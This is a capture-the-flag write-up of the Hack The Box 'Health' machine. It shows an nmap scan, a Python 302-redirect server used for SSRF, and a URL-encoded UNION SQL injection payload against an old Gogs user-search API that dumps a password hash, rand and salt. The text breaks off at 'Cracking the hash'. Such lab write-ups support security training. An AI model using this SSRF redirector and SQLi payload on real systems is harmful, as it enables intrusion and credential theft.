Hackthebox - Health

Author: irogir

Initial Enumeration

# Nmap 7.92 scan initiated Sun Aug 21 10:06:05 2022 as: nmap -sC -sV -vvv -oN nmap/health 10.129.11.149
Nmap scan report for 10.129.11.149
Host is up, received echo-reply ttl 63 (0.23s latency).
Scanned at 2022-08-21 10:06:06 IST for 19s
Not shown: 997 closed tcp ports (reset)
PORT     STATE    SERVICE REASON         VERSION
22/tcp   open     ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 32:b7:f4:d4:2f:45:d3:30:ee:12:3b:03:67:bb:e6:31 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChNRnKkpENG89qQHjD+2Kt9H7EDTMkQpzin70Rok0geRogbYVckxywChDv3yYhaDWQ9RrsOcWLs3uGzZR9nCfXOE3uTENbSWV5GdCd3wQNmWcSlkTD4dRcZshaAoMjs1bwzhK+cOy3ZU/ywbIXdHvAz3+Xvyz5yoEnboWYdWtBNFniZ7y/mZtA/XN19sCt5PcmeY40YFSuaVy/PUQnozplBVBIN6W5gnSE0Y+3J1MLBUkvf4+5zKvC+WLqA394Y1M+/UcVcPAjo6maik1JZNAmquWWo+y+28PdXSm9F2p2HAvwJjXc96f+Fl80+P4j1yxrhWC5AZM8fNCX8FjD7Jl7
|   256 86:e1:5d:8c:29:39:ac:d7:e8:15:e6:49:e2:35:ed:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOR0vwVJwhe/5A7dkomT/li2XC2nvv6/4J6Oe8Xeyi/YQspx3RQGz3aG1sWTPstLu7yno0Z+Lk/GotRdyivSdLA=
|   256 ef:6b:ad:64:d5:e4:5b:3e:66:79:49:f4:ec:4c:23:9f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINgiR3y8U+HenhKVoN1EFipbmC6EjO3fWwWPUqa8EeJh
80/tcp   open     http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HTTP Monitoring Tool
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
3000/tcp filtered ppp     no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 21 10:06:25 2022 -- 1 IP address (1 host up) scanned in 19.79 seconds

Web

Creating

Trying /webhook/ endpoint without UUID w get a stack trace

Trying file://… or http://localhost

throw an error as MonitoredURL blocked

Running an Python redirect server

#!/usr/bin/env python3

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2:
    print(f"THIS WAY: {sys.argv[0]} <port_number> <url>")
    sys.exit()

class Redirect(BaseHTTPRequestHandler):
   def do_GET(self):
       self.send_response(302)
       self.send_header('Location', sys.argv[2])
       self.end_headers()

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()

We see that port 3000 is running an Gogs Server

Also in the page we see that the gogs version is
really old

After lots of struggles i was able to proceed to get an SQLi

but using the SQLi

#!/usr/bin/env python3

import sys
import urllib.parse
from http.server import HTTPServer, BaseHTTPRequestHandler


payload = """') UNION ALL SELECT "a","b",(SELECT lower_name ||" " || passwd || " " || rand || " " || salt FROM user),"d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","zz" ---"""
payload = payload.replace('%','%25')
payload = payload.replace('\'','%27')
payload = payload.replace('"','%22')
payload = payload.replace(' ','%09')
payload = payload.replace('=','%3D')



if len(sys.argv)-1 != 2:
    print(f"THIS WAY: {sys.argv[0]} <port_number> <url>")
    sys.exit()

class Redirect(BaseHTTPRequestHandler):
   def do_GET(self):
       url=f"{sys.argv[2]}/api/v1/users/search?q={payload}"
       print(f"Redirecting: {url}")
       self.send_response(302)
       self.send_header('Location', url)
       self.end_headers()

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()

I got all the Values

username: susanne
password: 66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37
rand: m7483YfL9K
salt: sO3XIbeW14

Cracking the hash